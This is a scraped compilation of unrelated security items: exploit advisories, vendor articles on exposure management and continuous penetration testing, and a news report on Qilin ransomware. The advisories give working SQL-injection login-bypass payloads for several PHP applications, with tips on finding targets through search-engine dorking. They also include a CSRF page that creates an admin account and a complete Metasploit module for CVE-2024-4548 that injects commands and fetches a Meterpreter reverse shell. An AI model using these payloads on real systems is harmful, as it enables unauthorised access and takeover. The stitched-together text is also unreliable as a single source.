Company Visitor Management version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Company Visitor Management 1.0 Auth By Pass Vulnerability                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/04/Company-Visitor-Management-System-PHP.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/cvms/index.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Company Visitor Management 1.0 SQL Injection

Client Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Client ms Project 1.0 Auth By Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/client-management-system-using-php-mysql/                                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Client Management System 1.0 SQL Injection

CCMS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : CCMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/                                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

CCMS Project 1.0 SQL Injection

Biobook Social Networking Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : biobook Social Networking Site 1.0 Auth By Pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/social/home.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Biobook Social Networking Site 1.0 SQL Injection

Read the full article for key points from Intruder’s VP of Product, Andy Hornegold’s recent talk on exposure management. If you’d like to hear Andy’s insights first-hand, watch Intruder’s on-demand webinar. To learn more about reducing your attack surface, reach out to their team today. 
Attack surface management vs exposure management
Attack surface management (ASM) is the ongoing

_Read the full article for key points from Intruder's VP of Product, Andy Hornegold's recent talk on exposure management. If you'd like to hear Andy's insights first-hand, watch Intruder's on-demand webinar. To learn more about reducing your attack surface, reach out to their team today._

****Attack surface management vs exposure management****

Attack surface management (ASM) is the ongoing process of discovering and identifying assets that can be seen by an attacker on the internet, showing where security gaps exist, where they can be used to perform an attack, and where defenses are strong enough to repel an attack. If there's something on the internet that can be exploited by an attacker, it typically falls under the realm of attack surface management.

Exposure management takes this a step further to include data assets, user identities, and cloud account configuration. It can be summarized as the set of processes that allow organizations to continually and consistently evaluate the visibility, accessibility, and vulnerability of their digital assets.

****The continuous journey of managing threats****

Continuous management is key for a number of reasons. Your business, your attack surface and the threat landscape are not static, they are constantly changing and evolving. New vulnerabilities are disclosed hourly, new exploits for old vulnerabilities are publicly released, and threat actors are updating their techniques continuously. Additionally, new systems and services are often exposed to the internet, and if you are running CI/CD processes, your applications are frequently updated, which could create exploitable security gaps.

****Moving beyond CVEs****

More and more, vulnerability management is being seen through a narrow lens of vulnerabilities that have CVEs. Intruder's team disagreed with this approach, and believes that if there is a weakness in your attack surface, it is a vulnerability regardless of whether it has a CVE associated or not.

So, unlike the narrow approach to vulnerability management, exposure management takes in the entire vista - including misconfigurations and potential weaknesses that don't have an associated CVE. Take SQL injection, for example. It doesn't have a CVE but it's still a vulnerability in your application that could lead to serious consequences if exploited. Additionally, having Windows Remote Desktop exposed to the internet doesn't have an associated CVE, but it introduces risk that an attacker can attempt to exploit. Ultimately, exposure management provides a common name for how we perceive and manage these threats.

****Prioritizing vulnerabilities: the need for context****

Currently, most vulnerability scanners provide a list of vulnerabilities, each as a standalone data point. For example, they might report: 'System X has vulnerability Y; you should go fix it.' However, when dealing with large numbers of vulnerabilities, this information alone isn't enough.

Effective prioritization requires more context to ensure that your team's limited resource is focused on issues that will truly make a difference. For instance, it's crucial to understand which assets support your critical business functions, which vulnerabilities can be chained together to impact critical business functions, and where an attacker could potentially enter your network if these assets were exploited.

This approach transforms the management of vulnerabilities from siloed and isolated tasks into a cohesive strategy, providing the context needed to determine not only _if_ a vulnerability should be fixed, but also _when_.

Much like meditation helps filter out the daily bombardment of thoughts and distractions, Intruder's approach to exposure management aims to sift through the noise to focus on the issues that matter most.

****Why exposure management matters****

Exposure management matters because not everything that can be fixed, should be fixed immediately. Without a strategic approach, you risk wasting valuable time resolving low-impact issues, like an untrusted TLS certificate on an internal network, rather than addressing vulnerabilities that could lead to the compromise of a mission-critical system.

It is possible for you and your team to make a disproportionate and even more meaningful impact on your organization's risk profile by having more time to focus on strategically important activities that secure your organization more effectively. This can be achieved by avoiding a knee-jerk reaction to each vulnerability (akin to playing whack-a-mole), which is what exposure management aims to achieve.

It is possible to reduce the volume of tasks that your team is carrying out by scoping out your environment, understanding which assets support business-critical processes, establishing dedicated teams responsible for the remediation of those assets, and setting thresholds or triggers that specify when issues need to be addressed.

****The need for exposure management****

Recent examples of attackers gaining total control through seemingly innocuous entry points are aplenty.

A developer at Microsoft discovered a deliberately placed backdoor in xz-utils, an essential data compression utility for Linux and Unix-like operating systems. This vulnerability, found in versions 5.6.0 and 5.6.1, allowed an unknown threat actor to execute commands on systems that were running these versions of xz-utils and had SSH exposed to the internet. The discovery's timing was incredibly lucky, it was discovered before the compromised versions of xz-utils could make it into many mainstream Linux distributions like Debian and Red Hat.

Although there were no reported cases of exploitation, the potential risks were substantial. A threat actor would have gained access to those systems, giving them a jumping-off point to compromise other systems on any connected network to extract any and all sensitive data.

Security teams will have spent time and effort chasing down whether they were exposed. With exposure management, it would have been easy to identify any affected versions within your environments and quickly establish that the exposure was minimal since the compromised versions of xz-utils aren't that widespread.

Interestingly, the effort to embed the backdoor took four years, revealing a calculated and long-term scheme to compromise open-source software. This isn't necessarily new, but it shines a spotlight on the fact that advanced persistent threats aren't just focused on large enterprises; if threat actors can compromise an open source package like xz-utils and have it reach mainstream distributions, then everyone is at risk.

Then there's Palo Alto Networks. It issued an urgent call for companies to patch a critical zero-day vulnerability, known as CVE-2024-3400, in its widely used PAN-OS software that powers GlobalProtect firewall products. This flaw, found in the newer versions of the software, allows attackers to take complete control of an affected firewall remotely without requiring authentication, thus representing a significant threat to thousands of businesses relying on these firewalls for security. Given its potential for straightforward remote exploitation, Palo Alto has given this vulnerability the highest severity rating. Using attack surface management tools available to you, identifying vulnerable assets should be nearly instantaneous, and with an exposure management process in place the threshold for remediation should have allowed those responsible for remediation or mitigation to kick into action quickly.

These examples demonstrate how threats can be effectively shut down if organizations shift from a reactive, rush-to-fix approach to proactive exposure management, where they continuously manage their attack surface.

****‍Starting your journey towards effective exposure management****

Getting started with exposure management starts with practical, manageable steps:

1.  **Use what you already have:** First, remember you can leverage the services you're already using. For example, if you're using a tool like Intruder, you already have a vulnerability management and attack surface management provider that can kick-start your approach to exposure management. Alternatively, a consultancy service can conduct attack path mapping exercises and threat profile workshops.
2.  **Define your scope:** When defining the scope of what your exposure management process will cover, focus first on assets that are exposed to the internet, as these are often most vulnerable to attack. Intruder can help by providing you with a view of your internet-facing systems, which you can use as a starting point for your exposure management process. You can also use Intruder's target tagging to segment systems into your defined scopes. In the scoping process, you're also looking to identify individuals who are responsible for remediating the risk when a vulnerability is detected; you can add those users to Intruder and empower them to fix and validate that any issues have been resolved. If the data is available, also remember to keep track of the SaaS applications you use, as they can contain sensitive data and credentials.
3.  **Discover and prioritize your assets:** Use a tool to identify known and unknown assets and identify which are business-critical and support the scope you've defined previously. Intruder automatically discovers new cloud assets by integrating with your cloud accounts and runs automated checks for subdomains. You can also add context to your assets by using tags to specify how systems contribute to your business processes, and what risk they pose to those processes if they were compromised.
4.  **Carry out weakness discovery and prioritization:** The focus next shifts to assessing which of these assets are most at risk of being compromised and which would be the most attractive targets for cyber attackers. With Intruder you can find vulnerabilities in your infrastructure, applications, and APIs, and receive a prioritized list of issues so you know what to act on first. Intruder also provides a continuous approach to vulnerability discovery and prioritization by monitoring your network, showing you what's exposed and kicking off scans when anything changes.
5.  **Act:** Then it's time to act, be that through remediation, mitigation, or risk acceptance. Intruder makes it easy to manage and verify your remediation efforts. Run remediation scans, export issues to your ticketing systems, set up alerts in Slack and Teams, and more.

****Bringing it all back home****

Ultimately, we all have a limited amount of time.

By minimizing distractions and enabling your team to focus on what truly matters, exposure management allows you to achieve the greatest impact with the least time invested.

If your team is focusing on the 25% of vulnerabilities that actually matter, they have 75% extra time to focus on the activities that are critical to keeping your business secure.

Intruder aims to equip organizations to focus on the significant, the impactful, and ultimately, secure their digital landscape in today's fast-paced world.

And if that means more peaceful weekends and confidently stepping away from our desks knowing our assets are protected, then I believe we are on the right path. Perhaps, it's not so much about managing vulnerabilities or exposures but about managing our focus in the endless stream of cybersecurity threats.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Focus on What Matters Most: Exposure Management and Your Attack Surface

The threat actors behind a recently observed Qilin ransomware attack have stolen credentials stored in Google Chrome browsers on a small set of compromised endpoints.
The use of credential harvesting in connection with a ransomware infection marks an unusual twist, and one that could have cascading consequences, cybersecurity firm Sophos said in a Thursday report.
The attack, detected in July

The threat actors behind a recently observed Qilin ransomware attack have stolen credentials stored in Google Chrome browsers on a small set of compromised endpoints.

The use of credential harvesting in connection with a ransomware infection marks an unusual twist, and one that could have cascading consequences, cybersecurity firm Sophos said in a Thursday report.

The attack, detected in July 2024, involved infiltrating the target network via compromised credentials for a VPN portal that lacked multi-factor authentication (MFA), with the threat actors conducting post-exploitation actions 18 days after initial access took place.

"Once the attacker reached the domain controller in question, they edited the default domain policy to introduce a logon-based Group Policy Object (GPO) containing two items," researchers Lee Kirkpatrick, Paul Jacobs, Harshal Gosalia, and Robert Weiland said.

The first of them is a PowerShell script named "IPScanner.ps1" that's designed to harvest credential data stored within the Chrome browser. The second item is a batch script ("logon.bat") contacting commands to execute the first script.

"The attacker left this GPO active on the network for over three days," the researchers added.

"This provided ample opportunity for users to log on to their devices and, unbeknownst to them, trigger the credential-harvesting script on their systems. Again, since this was all done using a logon GPO, each user would experience this credential-scarfing each time they logged in."

The attackers then exfiltrated the stolen credentials and took steps to erase evidence of the activity before encrypting the files and dropping the ransom note in every directory on the system.

The theft of credentials stored in the Chrome browser means that affected users are now required to change their username-password combinations for every third-party site.

"Predictably, ransomware groups continue to change tactics and expand their repertoire of techniques," the researchers said.

"If they, or other attackers, have decided to also mine for endpoint-stored credentials – which could provide a foot in the door at a subsequent target, or troves of information about high-value targets to be exploited by other means – a dark new chapter may have opened in the ongoing story of cybercrime."

**Ever-evolving Trends in Ransomware**

The development comes as ransomware groups like Mad Liberator and Mimic have been observed using unsolicited AnyDesk requests for data exfiltration and leveraging internet-exposed Microsoft SQL servers for initial access, respectively.

The Mad Liberator attacks are further characterized by the threat actors abusing the access to transfer and launch a binary called "Microsoft Windows Update" that displays a bogus Windows Update splash screen to the victim to give the impression that software updates are being installed while the data is being plundered.

The abuse of legitimate remote desktop tools, as opposed to custom-made malware, offers attackers the perfect disguise to camouflage their malicious activities in plain sight, allowing them to blend in with normal network traffic and evade detection.

Ransomware continues to be a profitable venture for cybercriminals despite a series of law enforcement actions, with 2024 set to be the highest-grossing year yet. The year also saw the largest ransomware payment ever recorded at approximately $75 million to the Dark Angels ransomware group.

"The median ransom payment to the most severe ransomware strains has spiked from just under $200,000 in early 2023 to $1.5 million in mid-June 2024, suggesting that these strains are prioritizing targeting larger businesses and critical infrastructure providers that may be more likely to pay high ransoms due to their deep pockets and systemic importance," blockchain analytics firm Chainalysis said.

Ransomware victims are estimated to have paid $459.8 million to cybercriminals in the first half of the year, up from $449.1 million year-over-year. However, total ransomware payment events as measured on-chain have declined YoY by 27.29%, indicating a drop in payment rates.

What's more, Russian-speaking threat groups accounted for at least 69% of all cryptocurrency proceeds linked to ransomware throughout the previous year, exceeding $500 million.

According to data shared by NCC Group, the number of ransomware attacks observed in July 2024 jumped month-on-month from 331 to 395, but down from 502 registered last year. The most active ransomware families were RansomHub, LockBit, and Akira. The sectors that were most frequently targeted include industrials, consumer cyclicals, and hotels and entertainment.

Industrial organizations are a lucrative target for ransomware groups due to the mission-critical nature of their operations and the high impact of disruptions, thus increasing the likelihood that victims could pay the ransom amount demanded by attackers.

"Criminals focus where they can cause the most pain and disruption so the public will demand quick resolutions, and they hope, ransom payments to restore services more quickly," said Chester Wisniewski, global field chief technology officer at Sophos.

"This makes utilities prime targets for ransomware attacks. Because of the essential functions they provide, modern society demands they recover quickly and with minimal disruption."

Ransomware attacks targeting the sector have nearly doubled in Q2 2024 compared to Q1, from 169 to 312 incidents, per Dragos. A majority of the attacks singled out North America (187), followed by Europe (82), Asia (29), and South America (6).

"Ransomware actors are strategically timing their attacks to coincide with peak holiday periods in some regions to maximize disruption and pressure organizations into payment," NCC Group said.

Malwarebytes, in its own 2024 State of Ransomware report, highlighted three trends in ransomware tactics over the past year, including a spike in attacks during weekends and early morning hours between 1 a.m. and 5 a.m., and a reduction in the time from initial access to encryption.

Another noticeable shift is the increased edge service exploitation and targeting of small and medium-sized businesses, WithSecure said, adding the dismantling of LockBit and ALPHV (aka BlackCat) has led to an erosion of trust within the cybercriminal community, causing affiliates to move away from major brands.

Indeed, Coveware said over 10% of the incidents handled by the company in Q2 2024 were unaffiliated, meaning they were "attributed to attackers that were deliberately operating independently of a specific brand and what we typically term 'lone wolves.'"

"Continued takedowns of cybercriminal forums and marketplaces shortened the lifecycle of criminal sites, as the site administrators try to avoid drawing law enforcement (LE) attention," Europol said in an assessment released last month.

"This uncertainty, combined with a surge in exit scams, have contributed to the continued fragmentation of criminal marketplaces. Recent LE operations and the leak of ransomware source codes (e.g., Conti, LockBit, and HelloKitty) have led to a fragmentation of active ransomware groups and available variants."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Qilin Ransomware Attack Uses VPN Credentials, Steals Chrome Data

This Metasploit module exploit a remote SQL injection vulnerability in the CBEC service of DIAEnergie versions 1.10 and below from Delta Electronics. The commands will get executed in the context of NT AUTHORITY\SYSTEM.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',        'Description' => %q{          SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'Michael Heinzl', # MSF exploit          'Tenable' # Discovery & PoC        ],        'References' => [          [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],          [ 'CVE', '2024-4548']        ],        'DisclosureDate' => '2024-05-06',        'Platform' => 'win',        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Windows_Fetch',            {              'Arch' => [ ARCH_CMD ],              'Platform' => 'win',              'DefaultOptions' => {                'FETCH_COMMAND' => 'CURL',                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'              },              'Type' => :win_fetch            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(928)      ]    )  end  # Determine if the DIAEnergie version is vulnerable  def check    begin      connect      sock.put 'Who is it?'      res = sock.get || ''    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e      vprint_error(e.message)      return Exploit::CheckCode::Unknown    ensure      disconnect    end    if res.empty?      vprint_status('Received an empty response.')      return Exploit::CheckCode::Unknown    end    vprint_status('Who is it response: ' + res.to_s)    version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/    version = res.match(version_pattern)    if version[0].nil?      Exploit::CheckCode::Detected    end    vprint_status('Version retrieved: ' + version[0])    unless Rex::Version.new(version) <= Rex::Version.new('1.10.1.8610')      return CheckCode::Safe    end    return CheckCode::Appears  end  def exploit    execute_command(payload.encoded)  end  def execute_command(cmd)    scname = Rex::Text.rand_text_alphanumeric(5..10).to_s    vprint_status('Using random script name: ' + scname)    year = rand(2024..2026)    month = sprintf('%02d', rand(1..12))    day = sprintf('%02d', rand(1..29))    random_date = "#{year}-#{month}-#{day}"    vprint_status('Using random date: ' + random_date)    hour = sprintf('%02d', rand(0..23))    minute = sprintf('%02d', rand(0..59))    second = sprintf('%02d', rand(0..59))    random_time = "#{hour}:#{minute}:#{second}"    vprint_status('Using random time: ' + random_time)    # Inject payload    begin      print_status('Sending SQL injection...')      connect      vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")      sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"      res = sock.get      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)      end      vprint_status('Injection - Expected response received: ' + res.to_s)      disconnect      # Trigger      print_status('Triggering script execution...')      connect      sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"      res = sock.get      unless res.to_s == 'Recalculate Script Start!'        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)      end      vprint_status('Trigger - Expected response received: ' + res.to_s)      disconnect      print_good('Script successfully injected, check thy shell.')    ensure      # Cleanup      print_status('Cleaning up database...')      connect      sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"      res = sock.get      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)      end      vprint_status('Cleanup - Expected response received: ' + res.to_s)      disconnect    end  endend

DIAEnergie 1.10 SQL Injection

AVMS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AVMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/07/Apartment-Visitors-Management-System-Project.zip                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/AVMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AVMS Project 1.0 SQL Injection

Online Shopping System Master version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : online shopping system master v1.0 CSRF Vulnerability                                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Online_Shopping_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/adduser.php.

[+] save code as poc.html .

<div class="card">  
                <div class="card-header card-header-primary">  
                  <h4 class="card-title">Add Users</h4>  
                  <p class="card-category">Complete User profile</p>  
                </div>  
                <div class="card-body">  
                  <form action="http://127.0.0.1/online-shopping-system-master/admin/adduser.php" method="post" name="form" enctype="multipart/form-data">  
                    <div class="row">

                            </div>  
                      </div>  
                    </div>  
                    <div class="row">  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Email</label>  
                          <input type="email" name="email" id="email" class="form-control" required="">  
                        </div>  
                      </div>  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Password</label>  
                          <input type="password" id="password" name="password" class="form-control" required="">  
                        </div>  
                      </div>

                                        <button type="submit" name="btn_save" id="btn_save" class="btn btn-primary pull-right">Update User</button>  
                    <div class="clearfix"></div>  
                  </form>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Shopping System Master 1.0 Cross Site Request Forgery

What is Continuous Attack Surface Penetration Testing or CASPT?
Continuous Penetration Testing or Continuous Attack Surface Penetration Testing (CASPT) is an advanced security practice that involves the continuous, automated, and ongoing penetration testing services of an organization's digital assets to identify and mitigate security vulnerabilities. CASPT is designed for enterprises with an

****What is Continuous Attack Surface Penetration Testing or CASPT?****

Continuous Penetration Testing or Continuous Attack Surface Penetration Testing (CASPT) is an advanced security practice that involves the continuous, automated, and ongoing penetration testing services of an organization's digital assets to identify and mitigate security vulnerabilities. CASPT is designed for enterprises with an evolving attack surface where periodic pentesting is no longer sufficient. Unlike traditional penetration testing, which is often performed annually or semi-annually, CASPT is an ongoing process that integrates directly into the software development lifecycle (SDLC), ensuring that vulnerabilities are discovered and addressed in real-time or near-real-time.

CASPT is a proactive security measure designed to stay ahead of potential attackers by continuously evaluating the security posture of an organization. It enables security teams to identify critical entry points that could be exploited by attackers, validate the effectiveness of existing security controls, and ensure that any newly introduced code or infrastructure changes do not introduce new vulnerabilities. Users can run baseline tests to share changes or new updates across assets and associated vulnerabilities providing a roadmap for pentesting teams as soon as changes are detected.

****What Continuous Attack Surface Penetration Testing is Not****

While CASPT shares similarities with traditional penetration testing, there are distinct differences:

1.  **Not a One-Time Assessment**: Traditional penetration testing is typically a one-time assessment conducted periodically. CASPT, however, is an ongoing process, with tests running continuously or on a frequent, scheduled basis.
2.  **Not Just Automated**: CASPT is not limited to automated tools. While automation plays a significant role, continuous penetration testing also involves human expertise to conduct more sophisticated and context-aware attacks that automated tools might miss.
3.  **Not Isolated**: CASPT is not a standalone practice. It is integrated with other security measures such as Attack Surface Management (ASM) and Red Teaming exercises to provide a holistic view of an organization's security posture.

****How CASPT is Applied Across Different Assets****

Continuous Attack Surface Penetration Testing can be applied across a variety of digital assets, including:

1.  **Web Applications**: Continuous testing of web applications helps in identifying vulnerabilities like SQL injection, cross-site scripting (XSS), and broken authentication mechanisms. Automated tools can scan for known vulnerabilities, while manual testing can uncover complex logic flaws that automated tools might miss.
2.  **APIs**: As APIs become more prevalent, they present an increasing attack surface. API Penetration Testing ensures that they are secure against common threats such as API key leaks, broken object level authorization, and injection attacks.
3.  **Cloud Environments**: Cloud security is critical as more organizations move to cloud-based infrastructure. Continuous penetration testing in the cloud involves checking configurations, access controls, and potential vulnerabilities in cloud services to prevent unauthorized access and data breaches.
4.  **Networks**: Network security is a foundational aspect of any organization's security posture. Continuous penetration testing of networks involves scanning for open ports, misconfigured firewalls, and outdated software that could be exploited by attackers.
5.  **Mobile Applications**: With the proliferation of mobile apps, securing them is crucial. Continuous penetration testing for mobile apps focuses on vulnerabilities specific to mobile environments, such as insecure data storage, improper session handling, and weak encryption.

****Integration with Attack Surface Management and Red Teaming****

Integrating continuous penetration testing with Attack Surface Management (ASM) and red teaming offers a robust, dynamic security approach that enhances an organization's resilience against cyber threats. Here's how CASPT integration works and its benefits:

**1\. Continuous Attack Surface Pentesting**

CASPT involves the ongoing, automated assessment of an organization's systems to identify vulnerabilities. Unlike traditional, periodic pentests, this approach ensures that security assessments are always up to date, helping to discover new vulnerabilities as they emerge.

**2\. Attack Surface Management (ASM)**

ASM involves continuously monitoring and analyzing an organization's digital footprint to identify vulnerable assets and associate vulnerabilities for prioritization for mitigation of potential attack vectors. This prioritization acts as a roadmap for pentesting reducing valuable time and resources. When combined with CASPT, ASM helps organizations maintain an up-to-date understanding of their attack surface, ensuring that continuous penetration tests are focused on the most critical assets.

**3\. Red Teaming**

Red teaming simulates real-world cyberattacks by having a team of ethical hackers attempt to breach the organization's defenses. This provides a deeper understanding of the effectiveness of the security measures in place. When combined with CASPT, red teaming benefits from up-to-date knowledge of vulnerabilities and attack surfaces, making the simulations more accurate and relevant.

****How the Integration Works****

*   **Automation and Scalability**: CASPT tools are often automated, allowing them to scan for vulnerabilities at scale and in real-time. When integrated with ASM, these tools can prioritize scans based on the most critical assets or newly discovered attack surfaces, ensuring that the most significant risks are addressed first.
*   **Real-time Threat Detection**: ASM provides a real-time view of the organization's digital footprint, including any changes or new assets. CASPT can immediately test these new assets for vulnerabilities, reducing the window of opportunity for attackers.
*   **Enhanced Red Teaming**: Red teams can use the data from ASM and continuous pentesting to focus their efforts on the most critical and vulnerable areas. This targeted approach increases the likelihood of uncovering sophisticated attack vectors that may go unnoticed in a standard pentest.
*   **Proactive Security Posture**: By continuously identifying and testing vulnerabilities, organizations shift from a reactive to a proactive security posture. This approach not only helps in finding and fixing vulnerabilities before they are exploited but also in understanding how an attacker might move laterally through the network.

The benefits of integrating CASPT with other offensive security tools like ASM and red teaming are significant including a reduced attack surface, increased resilience to withstand real-world attacks, cost-efficiencies from reduced breaches and operational downtime, and meeting regulatory requirements by providing ongoing evidence of security practices and vulnerabilities management.

****Why Continuous Attack Surface Penetration Testing is Important****

The importance of CASPT is underscored by several key benefits:

****Cost-Effectiveness****

While the initial investment in CASPT may be higher than traditional penetration testing, the long-term cost savings are significant. By continuously identifying and mitigating vulnerabilities, organizations can avoid the costs associated with data breaches, regulatory fines, and reputational damage.

****Increased Visibility****

CASPT provides ongoing visibility into an organization's security posture. This enables security teams to identify and address vulnerabilities as they arise, rather than waiting for the next scheduled penetration test. For those providers who provide automated vulnerability validation and mapping, users will have enhanced visibility with an actual roadmap of all attack paths and routes to identified vulnerabilities remediating exposures before an actual attack can occur.

****Compliance****

Many regulatory frameworks and industry standards now require organizations to conduct regular security assessments. CASPT helps organizations meet these requirements by providing a continuous stream of security testing data that can be used to demonstrate compliance.

****Attack Path Validation and Mapping****

More innovative CASPT providers offer organizations with continuous validation of their attack paths by with an automatic visualization that maps out all potential routes an attacker might take to compromise critical assets from domain, subdomains, IP addresses, and discovered vulnerabilities. This enables security teams to focus their efforts on securing the most vulnerable areas of their environment.

****Why Annual Penetration Testing Isn't Enough Anymore****

We are all aware that the cybersecurity landscape is constantly evolving, with new threats and vulnerabilities emerging daily. Annual penetration testing, while valuable, is no longer sufficient to keep up with the pace of these changes. There are several reasons why annual penetration testing falls short:

1.  **Delayed Identification of Vulnerabilities**: With annual testing, vulnerabilities may remain undiscovered for months, leaving the organization exposed to potential attacks. CASPT, on the other hand, ensures that vulnerabilities are identified and addressed as soon as they are introduced.
2.  **Dynamic Environments:** Modern IT environments are highly dynamic, with frequent changes to code, infrastructure, and configurations. Annual or periodic pentesting does not account for these continuous changes, potentially missing critical vulnerabilities introduced between tests.
3.  **Increased Attack Sophistication**: Attackers are becoming more sophisticated, employing advanced techniques that can bypass traditional defenses. Continuous testing helps organizations stay ahead of these evolving threats by constantly evaluating their security posture.

****Top 10 Use Cases for Continuous Attack Surface Penetration Testing****

Considering CASPT depends on various factors related to the organization's security needs and business objectives, industry requirements, and threat landscape. Here's a deeper dive into various scenarios and when and why an organization might consider adopting CASPT:

****1\. Highly Dynamic Environments****

**Scenario**: Organizations with rapidly changing IT environments, such as those frequently deploying new applications, services, or updates.

**Reason:** In such environments, the attack surface is constantly evolving, and traditional periodic pentesting may miss newly introduced vulnerabilities. CASPT ensures that every change is tested for security weaknesses as soon as it's made, reducing the risk of unpatched vulnerabilities being exploited.

****2\. Regulatory and Compliance Requirements****

**Scenario**: Industries with strict compliance standards, such as finance, healthcare, or critical infrastructure, where maintaining high levels of security is mandatory.

**Reason:** CASPT provides ongoing evidence of vulnerability management and proactive security measures, helping organizations meet compliance requirements like PCI-DSS, HIPAA, or GDPR. This approach demonstrates a commitment to security, which is crucial for audits and regulatory reporting.

****3\. High-Value Targets****

